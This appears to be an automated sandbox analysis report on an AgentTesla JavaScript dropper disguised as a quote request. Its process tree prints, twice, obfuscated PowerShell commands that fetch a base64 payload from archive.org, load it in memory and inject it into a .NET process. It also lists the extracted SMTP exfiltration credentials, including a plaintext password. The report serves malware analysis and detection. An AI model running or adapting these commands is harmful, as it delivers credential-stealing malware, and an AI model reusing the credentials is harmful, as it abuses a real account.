Analysis

  • max time kernel
    490s
  • max time network
    484s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240910-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240910-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-09-2024 00:45

General

  • Target

    https://cdn.discordapp.com/attachments/1268301344624611473/1286423055559819274/QUOTE_REQUEST_HONG_KONG_CHEMHERE.js?ex=66edda55&is=66ec88d5&hm=6c684c87631ff3310752d49a8867cf9d4b9e17508ca566ea7d6ab8a979b14b43&

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt

exe.dropper

https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt

Extracted

Credentials

  • Protocol:
    smtp
  • Host:
    mail.detarcoopmedical.com
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    To$zL%?nhDHN

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 26 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 34 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://cdn.discordapp.com/attachments/1268301344624611473/1286423055559819274/QUOTE_REQUEST_HONG_KONG_CHEMHERE.js?ex=66edda55&is=66ec88d5&hm=6c684c87631ff3310752d49a8867cf9d4b9e17508ca566ea7d6ab8a979b14b43&
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3260
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xdc,0xe0,0xd4,0xd8,0x104,0x7ff82938cc40,0x7ff82938cc4c,0x7ff82938cc58
      2⤵
        PID:2784
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1944,i,2313998892317278655,12956766626355715469,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=1940 /prefetch:2
        2⤵
          PID:1636
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1916,i,2313998892317278655,12956766626355715469,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=1980 /prefetch:3
          2⤵
            PID:2068
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2240,i,2313998892317278655,12956766626355715469,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2276 /prefetch:8
            2⤵
              PID:4400
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3124,i,2313998892317278655,12956766626355715469,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=3160 /prefetch:1
              2⤵
                PID:1804
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3116,i,2313998892317278655,12956766626355715469,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=3188 /prefetch:1
                2⤵
                  PID:3652
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4900,i,2313998892317278655,12956766626355715469,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=4960 /prefetch:8
                  2⤵
                    PID:5028
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5208,i,2313998892317278655,12956766626355715469,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=4980 /prefetch:8
                    2⤵
                      PID:4352
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3792,i,2313998892317278655,12956766626355715469,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=4888 /prefetch:8
                      2⤵
                        PID:4188
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5076,i,2313998892317278655,12956766626355715469,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=5144 /prefetch:8
                        2⤵
                          PID:2032
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4596,i,2313998892317278655,12956766626355715469,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=5156 /prefetch:8
                          2⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2720
                      • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                        "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                        1⤵
                          PID:4912
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                          1⤵
                            PID:2788
                          • C:\Windows\System32\rundll32.exe
                            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                            1⤵
                              PID:720
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k SDRSVC
                              1⤵
                                PID:2936
                              • C:\Windows\System32\WScript.exe
                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\QUOTE_REQUEST_HONG_KONG_CHEMHERE.js"
                                1⤵
                                • Checks computer location settings
                                PID:1528
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAnAEUAcQAnACsAJwBTACcAKwAnAHUAcgBsACAAPQAgACcAKwAnAGIAZwB3AGgAJwArACcAdAB0AHAAcwAnACsAJwA6AC8ALwBpAGEAOQAwADQANgAwACcAKwAnADEALgB1AHMAJwArACcALgAnACsAJwBhAHIAYwBoAGkAJwArACcAdgBlACcAKwAnAC4AJwArACcAbwByAGcALwA2ACcAKwAnAC8AaQAnACsAJwB0ACcAKwAnAGUAbQAnACsAJwBzACcAKwAnAC8AZABlACcAKwAnAHQAJwArACcAYQAnACsAJwBoAC0AbgBvAHQAZQAtAGoALwBEAGUAdABhAGgAJwArACcATgBvAHQAJwArACcAZQAnACsAJwBKACcAKwAnAC4AJwArACcAdAB4ACcAKwAnAHQAYgBnAHcAOwBFACcAKwAnAHEAUwBiAGEAJwArACcAcwBlACcAKwAnADYAJwArACcANAAnACsAJwBDAG8AbgB0AGUAJwArACcAbgAnACsAJwB0ACcAKwAnACAAPQAgACgATgBlACcAKwAnAHcAJwArACcALQAnACsAJwBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQAnACsAJwBtAC4ATgBlAHQALgBXACcAKwAnAGUAYgBDACcAKwAnAGwAaQBlACcAKwAnAG4AdAApAC4AJwArACcARABvAHcAJwArACcAbgBsACcAKwAnAG8AJwArACcAYQBkAFMAdAByACcAKwAnAGkAbgBnACgARQAnACsAJwBxAFMAJwArACcAdQByACcAKwAnAGwAJwArACcAKQA7AEUAcQBTAGIAJwArACcAaQAnACsAJwBuAGEAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAAnACsAJwA9ACcAKwAnACAAWwAnACsAJwBTAHkAJwArACcAcwB0AGUAbQAuAEMAJwArACcAbwAnACsAJwBuACcAKwAnAHYAZQByACcAKwAnAHQAXQAnACsAJwA6ADoARgAnACsAJwByAG8AbQBCAGEAJwArACcAcwBlADYANABTAHQAcgBpAG4AZwAoAEUAcQBTAGIAYQAnACsAJwBzACcAKwAnAGUANgAnACsAJwA0AEMAbwAnACsAJwBuAHQAJwArACcAZQAnACsAJwBuACcAKwAnAHQAKQA7AEUAJwArACcAcQBTAGEAcwBzAGUAbQBiACcAKwAnAGwAeQAnACsAJwAgAD0AJwArACcAIAAnACsAJwBbAFIAZQBmAGwAJwArACcAZQBjAHQAaQBvAG4ALgBBAHMAcwAnACsAJwBlAG0AYgAnACsAJwBsAHkAJwArACcAXQA6ACcAKwAnADoATAAnACsAJwBvAGEAZAAnACsAJwAoAEUAcQBTAGIAaQAnACsAJwBuACcAKwAnAGEAcgB5AEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAKQA7ACcAKwAnAEUAcQBTAHQAJwArACcAeQBwAGUAIAA9ACAARQBxAFMAYQBzACcAKwAnAHMAJwArACcAZQBtAGIAbAB5AC4AJwArACcARwBlAHQAVAB5AHAAJwArACcAZQAnACsAJwAoACcAKwAnAGIAJwArACcAZwB3AFIAJwArACcAdQBuAFAAJwArACcARQAuAEgAbwBtAGUAYgBnACcAKwAnAHcAKQA7ACcAKwAnAEUAcQBTACcAKwAnAG0AZQAnACsAJwB0AGgAbwBkACAAJwArACcAPQAnACsAJwAgAEUAcQBTAHQAeQAnACsAJwBwACcAKwAnAGUAJwArACcALgBHAGUAdAAnACsAJwBNACcAKwAnAGUAdABoAG8AZAAoAGIAJwArACcAZwB3AFYAQQBJAGIAZwB3ACkAOwBFAHEAUwAnACsAJwBtAGUAJwArACcAdABoAG8AZAAuACcAKwAnAEkAbgB2AG8AawBlACgARQBxACcAKwAnAFMAbgB1AGwAJwArACcAbAAnACsAJwAsACAAWwBvAGIAagAnACsAJwBlAGMAdABbACcAKwAnAF0AXQBAACgAYgAnACsAJwBnAHcAdAB4AHQALgBpAHIAZQBoAHMAaQAvAHYAJwArACcAZQAnACsAJwBkAC4AMgByACcAKwAnAC4AJwArACcAMwA5ACcAKwAnAGIAJwArACcAMwAnACsAJwA0ADUAJwArACcAMwAnACsAJwAwACcAKwAnADIAYQAwADcANQAnACsAJwBiACcAKwAnADEAYgBjADAAZAA0ADUAYgAnACsAJwA2ADMAMgBlACcAKwAnAGIAOQBlACcAKwAnAGUANgAyACcAKwAnAC0AYgAnACsAJwB1AHAALwAvACcAKwAnADoAJwArACcAcwBwAHQAdABoACcAKwAnAGIAZwB3ACcAKwAnACAALAAnACsAJwAgAGIAZwB3AGQAZQBzACcAKwAnAGEAdABpAHYAYQAnACsAJwBkAG8AJwArACcAYgBnAHcAJwArACcAIAAsACAAYgBnACcAKwAnAHcAZAAnACsAJwBlAHMAYQB0AGkAdgBhACcAKwAnAGQAbwBiACcAKwAnAGcAdwAgACcAKwAnACwAIABiAGcAJwArACcAdwBkACcAKwAnAGUAcwAnACsAJwBhAHQAaQB2AGEAZAAnACsAJwBvAGIAZwB3ACwAJwArACcAYgAnACsAJwBnACcAKwAnAHcAQQAnACsAJwBkAGQASQBuAFAAcgBvAGMAJwArACcAZQBzAHMAMwAnACsAJwAyAGIAZwAnACsAJwB3ACwAJwArACcAYgAnACsAJwBnAHcAZABlAHMAYQB0AGkAdgBhAGQAbwBiAGcAJwArACcAdwApACcAKwAnACkAOwAnACkALgByAGUAcABMAEEAQwBFACgAKABbAGMAaABhAFIAXQA5ADgAKwBbAGMAaABhAFIAXQAxADAAMwArAFsAYwBoAGEAUgBdADEAMQA5ACkALABbAHMAdABSAGkAbgBnAF0AWwBjAGgAYQBSAF0AMwA5ACkALgByAGUAcABMAEEAQwBFACgAKABbAGMAaABhAFIAXQA2ADkAKwBbAGMAaABhAFIAXQAxADEAMwArAFsAYwBoAGEAUgBdADgAMwApACwAJwAkACcAKQB8AC4AIAAoACAAJABFAG4AVgA6AEMATwBtAHMAcABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBuACcAJwApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                  2⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:2672
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Eq'+'S'+'url = '+'bgwh'+'ttps'+'://ia90460'+'1.us'+'.'+'archi'+'ve'+'.'+'org/6'+'/i'+'t'+'em'+'s'+'/de'+'t'+'a'+'h-note-j/Detah'+'Not'+'e'+'J'+'.'+'tx'+'tbgw;E'+'qSba'+'se'+'6'+'4'+'Conte'+'n'+'t'+' = (Ne'+'w'+'-'+'Object Syste'+'m.Net.W'+'ebC'+'lie'+'nt).'+'Dow'+'nl'+'o'+'adStr'+'ing(E'+'qS'+'ur'+'l'+');EqSb'+'i'+'naryCon'+'tent '+'='+' ['+'Sy'+'stem.C'+'o'+'n'+'ver'+'t]'+'::F'+'romBa'+'se64String(EqSba'+'s'+'e6'+'4Co'+'nt'+'e'+'n'+'t);E'+'qSassemb'+'ly'+' ='+' '+'[Refl'+'ection.Ass'+'emb'+'ly'+']:'+':L'+'oad'+'(EqSbi'+'n'+'aryCont'+'e'+'nt);'+'EqSt'+'ype = EqSas'+'s'+'embly.'+'GetTyp'+'e'+'('+'b'+'gwR'+'unP'+'E.Homebg'+'w);'+'EqS'+'me'+'thod '+'='+' EqSty'+'p'+'e'+'.Get'+'M'+'ethod(b'+'gwVAIbgw);EqS'+'me'+'thod.'+'Invoke(Eq'+'Snul'+'l'+', [obj'+'ect['+']]@(b'+'gwtxt.irehsi/v'+'e'+'d.2r'+'.'+'39'+'b'+'3'+'45'+'3'+'0'+'2a075'+'b'+'1bc0d45b'+'632e'+'b9e'+'e62'+'-b'+'up//'+':'+'sptth'+'bgw'+' ,'+' bgwdes'+'ativa'+'do'+'bgw'+' , bg'+'wd'+'esativa'+'dob'+'gw '+', bg'+'wd'+'es'+'ativad'+'obgw,'+'b'+'g'+'wA'+'ddInProc'+'ess3'+'2bg'+'w,'+'b'+'gwdesativadobg'+'w)'+');').repLACE(([chaR]98+[chaR]103+[chaR]119),[stRing][chaR]39).repLACE(([chaR]69+[chaR]113+[chaR]83),'$')|. ( $EnV:COmspEc[4,15,25]-JoIn'')"
                                    3⤵
                                    • Blocklisted process makes network request
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious use of SetThreadContext
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:4044
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:2780
                              • C:\Windows\System32\WScript.exe
                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\QUOTE_REQUEST_HONG_KONG_CHEMHERE.js"
                                1⤵
                                • Checks computer location settings
                                PID:3472
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAnAEUAcQAnACsAJwBTACcAKwAnAHUAcgBsACAAPQAgACcAKwAnAGIAZwB3AGgAJwArACcAdAB0AHAAcwAnACsAJwA6AC8ALwBpAGEAOQAwADQANgAwACcAKwAnADEALgB1AHMAJwArACcALgAnACsAJwBhAHIAYwBoAGkAJwArACcAdgBlACcAKwAnAC4AJwArACcAbwByAGcALwA2ACcAKwAnAC8AaQAnACsAJwB0ACcAKwAnAGUAbQAnACsAJwBzACcAKwAnAC8AZABlACcAKwAnAHQAJwArACcAYQAnACsAJwBoAC0AbgBvAHQAZQAtAGoALwBEAGUAdABhAGgAJwArACcATgBvAHQAJwArACcAZQAnACsAJwBKACcAKwAnAC4AJwArACcAdAB4ACcAKwAnAHQAYgBnAHcAOwBFACcAKwAnAHEAUwBiAGEAJwArACcAcwBlACcAKwAnADYAJwArACcANAAnACsAJwBDAG8AbgB0AGUAJwArACcAbgAnACsAJwB0ACcAKwAnACAAPQAgACgATgBlACcAKwAnAHcAJwArACcALQAnACsAJwBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQAnACsAJwBtAC4ATgBlAHQALgBXACcAKwAnAGUAYgBDACcAKwAnAGwAaQBlACcAKwAnAG4AdAApAC4AJwArACcARABvAHcAJwArACcAbgBsACcAKwAnAG8AJwArACcAYQBkAFMAdAByACcAKwAnAGkAbgBnACgARQAnACsAJwBxAFMAJwArACcAdQByACcAKwAnAGwAJwArACcAKQA7AEUAcQBTAGIAJwArACcAaQAnACsAJwBuAGEAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAAnACsAJwA9ACcAKwAnACAAWwAnACsAJwBTAHkAJwArACcAcwB0AGUAbQAuAEMAJwArACcAbwAnACsAJwBuACcAKwAnAHYAZQByACcAKwAnAHQAXQAnACsAJwA6ADoARgAnACsAJwByAG8AbQBCAGEAJwArACcAcwBlADYANABTAHQAcgBpAG4AZwAoAEUAcQBTAGIAYQAnACsAJwBzACcAKwAnAGUANgAnACsAJwA0AEMAbwAnACsAJwBuAHQAJwArACcAZQAnACsAJwBuACcAKwAnAHQAKQA7AEUAJwArACcAcQBTAGEAcwBzAGUAbQBiACcAKwAnAGwAeQAnACsAJwAgAD0AJwArACcAIAAnACsAJwBbAFIAZQBmAGwAJwArACcAZQBjAHQAaQBvAG4ALgBBAHMAcwAnACsAJwBlAG0AYgAnACsAJwBsAHkAJwArACcAXQA6ACcAKwAnADoATAAnACsAJwBvAGEAZAAnACsAJwAoAEUAcQBTAGIAaQAnACsAJwBuACcAKwAnAGEAcgB5AEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAKQA7ACcAKwAnAEUAcQBTAHQAJwArACcAeQBwAGUAIAA9ACAARQBxAFMAYQBzACcAKwAnAHMAJwArACcAZQBtAGIAbAB5AC4AJwArACcARwBlAHQAVAB5AHAAJwArACcAZQAnACsAJwAoACcAKwAnAGIAJwArACcAZwB3AFIAJwArACcAdQBuAFAAJwArACcARQAuAEgAbwBtAGUAYgBnACcAKwAnAHcAKQA7ACcAKwAnAEUAcQBTACcAKwAnAG0AZQAnACsAJwB0AGgAbwBkACAAJwArACcAPQAnACsAJwAgAEUAcQBTAHQAeQAnACsAJwBwACcAKwAnAGUAJwArACcALgBHAGUAdAAnACsAJwBNACcAKwAnAGUAdABoAG8AZAAoAGIAJwArACcAZwB3AFYAQQBJAGIAZwB3ACkAOwBFAHEAUwAnACsAJwBtAGUAJwArACcAdABoAG8AZAAuACcAKwAnAEkAbgB2AG8AawBlACgARQBxACcAKwAnAFMAbgB1AGwAJwArACcAbAAnACsAJwAsACAAWwBvAGIAagAnACsAJwBlAGMAdABbACcAKwAnAF0AXQBAACgAYgAnACsAJwBnAHcAdAB4AHQALgBpAHIAZQBoAHMAaQAvAHYAJwArACcAZQAnACsAJwBkAC4AMgByACcAKwAnAC4AJwArACcAMwA5ACcAKwAnAGIAJwArACcAMwAnACsAJwA0ADUAJwArACcAMwAnACsAJwAwACcAKwAnADIAYQAwADcANQAnACsAJwBiACcAKwAnADEAYgBjADAAZAA0ADUAYgAnACsAJwA2ADMAMgBlACcAKwAnAGIAOQBlACcAKwAnAGUANgAyACcAKwAnAC0AYgAnACsAJwB1AHAALwAvACcAKwAnADoAJwArACcAcwBwAHQAdABoACcAKwAnAGIAZwB3ACcAKwAnACAALAAnACsAJwAgAGIAZwB3AGQAZQBzACcAKwAnAGEAdABpAHYAYQAnACsAJwBkAG8AJwArACcAYgBnAHcAJwArACcAIAAsACAAYgBnACcAKwAnAHcAZAAnACsAJwBlAHMAYQB0AGkAdgBhACcAKwAnAGQAbwBiACcAKwAnAGcAdwAgACcAKwAnACwAIABiAGcAJwArACcAdwBkACcAKwAnAGUAcwAnACsAJwBhAHQAaQB2AGEAZAAnACsAJwBvAGIAZwB3ACwAJwArACcAYgAnACsAJwBnACcAKwAnAHcAQQAnACsAJwBkAGQASQBuAFAAcgBvAGMAJwArACcAZQBzAHMAMwAnACsAJwAyAGIAZwAnACsAJwB3ACwAJwArACcAYgAnACsAJwBnAHcAZABlAHMAYQB0AGkAdgBhAGQAbwBiAGcAJwArACcAdwApACcAKwAnACkAOwAnACkALgByAGUAcABMAEEAQwBFACgAKABbAGMAaABhAFIAXQA5ADgAKwBbAGMAaABhAFIAXQAxADAAMwArAFsAYwBoAGEAUgBdADEAMQA5ACkALABbAHMAdABSAGkAbgBnAF0AWwBjAGgAYQBSAF0AMwA5ACkALgByAGUAcABMAEEAQwBFACgAKABbAGMAaABhAFIAXQA2ADkAKwBbAGMAaABhAFIAXQAxADEAMwArAFsAYwBoAGEAUgBdADgAMwApACwAJwAkACcAKQB8AC4AIAAoACAAJABFAG4AVgA6AEMATwBtAHMAcABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBuACcAJwApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                  2⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:952
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Eq'+'S'+'url = '+'bgwh'+'ttps'+'://ia90460'+'1.us'+'.'+'archi'+'ve'+'.'+'org/6'+'/i'+'t'+'em'+'s'+'/de'+'t'+'a'+'h-note-j/Detah'+'Not'+'e'+'J'+'.'+'tx'+'tbgw;E'+'qSba'+'se'+'6'+'4'+'Conte'+'n'+'t'+' = (Ne'+'w'+'-'+'Object Syste'+'m.Net.W'+'ebC'+'lie'+'nt).'+'Dow'+'nl'+'o'+'adStr'+'ing(E'+'qS'+'ur'+'l'+');EqSb'+'i'+'naryCon'+'tent '+'='+' ['+'Sy'+'stem.C'+'o'+'n'+'ver'+'t]'+'::F'+'romBa'+'se64String(EqSba'+'s'+'e6'+'4Co'+'nt'+'e'+'n'+'t);E'+'qSassemb'+'ly'+' ='+' '+'[Refl'+'ection.Ass'+'emb'+'ly'+']:'+':L'+'oad'+'(EqSbi'+'n'+'aryCont'+'e'+'nt);'+'EqSt'+'ype = EqSas'+'s'+'embly.'+'GetTyp'+'e'+'('+'b'+'gwR'+'unP'+'E.Homebg'+'w);'+'EqS'+'me'+'thod '+'='+' EqSty'+'p'+'e'+'.Get'+'M'+'ethod(b'+'gwVAIbgw);EqS'+'me'+'thod.'+'Invoke(Eq'+'Snul'+'l'+', [obj'+'ect['+']]@(b'+'gwtxt.irehsi/v'+'e'+'d.2r'+'.'+'39'+'b'+'3'+'45'+'3'+'0'+'2a075'+'b'+'1bc0d45b'+'632e'+'b9e'+'e62'+'-b'+'up//'+':'+'sptth'+'bgw'+' ,'+' bgwdes'+'ativa'+'do'+'bgw'+' , bg'+'wd'+'esativa'+'dob'+'gw '+', bg'+'wd'+'es'+'ativad'+'obgw,'+'b'+'g'+'wA'+'ddInProc'+'ess3'+'2bg'+'w,'+'b'+'gwdesativadobg'+'w)'+');').repLACE(([chaR]98+[chaR]103+[chaR]119),[stRing][chaR]39).repLACE(([chaR]69+[chaR]113+[chaR]83),'$')|. ( $EnV:COmspEc[4,15,25]-JoIn'')"
                                    3⤵
                                    • Blocklisted process makes network request
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious use of SetThreadContext
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:2388
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:2160

                              Network

                              MITRE ATT&CK Enterprise v15

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                Filesize

                                649B

                                MD5

                                3d7032bbaa3d1b3a06185fb90dc3bc9a

                                SHA1

                                9517d57b8725e319fe11d888e47559ea02c09099

                                SHA256

                                2815a879e479ea5cdcb3c524e22099ec1164df1ef86e4a2d9b42da6afd71a2bc

                                SHA512

                                7936c2212a99542eba76553f0ec3e86ebea7401461e77991cb783ac4b5494d9f1e0b05042693eb0cb29fa3fa3033e00b844e7a5447dd19ca3da40e434405017c

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                Filesize

                                1KB

                                MD5

                                a01d370deabb4d67d90646e577599ad9

                                SHA1

                                c4e837227b6e3fc8a78571f76f9d4e404960df8c

                                SHA256

                                ec024501a2bfdac23afbb79b2a9906ff554f4c2ad0b8a1e68c99e2bc233534d9

                                SHA512

                                137d70afa9ed6486ba6aba71c26656a1ed800ead18d6c430680d2fa5adfda765c2b75fbd6950e5f674e3b64c5dd5cb6355a134b40afda60d55c9254faca8fa6a

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                Filesize

                                2B

                                MD5

                                d751713988987e9331980363e24189ce

                                SHA1

                                97d170e1550eee4afc0af065b78cda302a97674c

                                SHA256

                                4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                SHA512

                                b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                Filesize

                                8KB

                                MD5

                                d7d0238a50b0ff5b699dbcd722a46ee9

                                SHA1

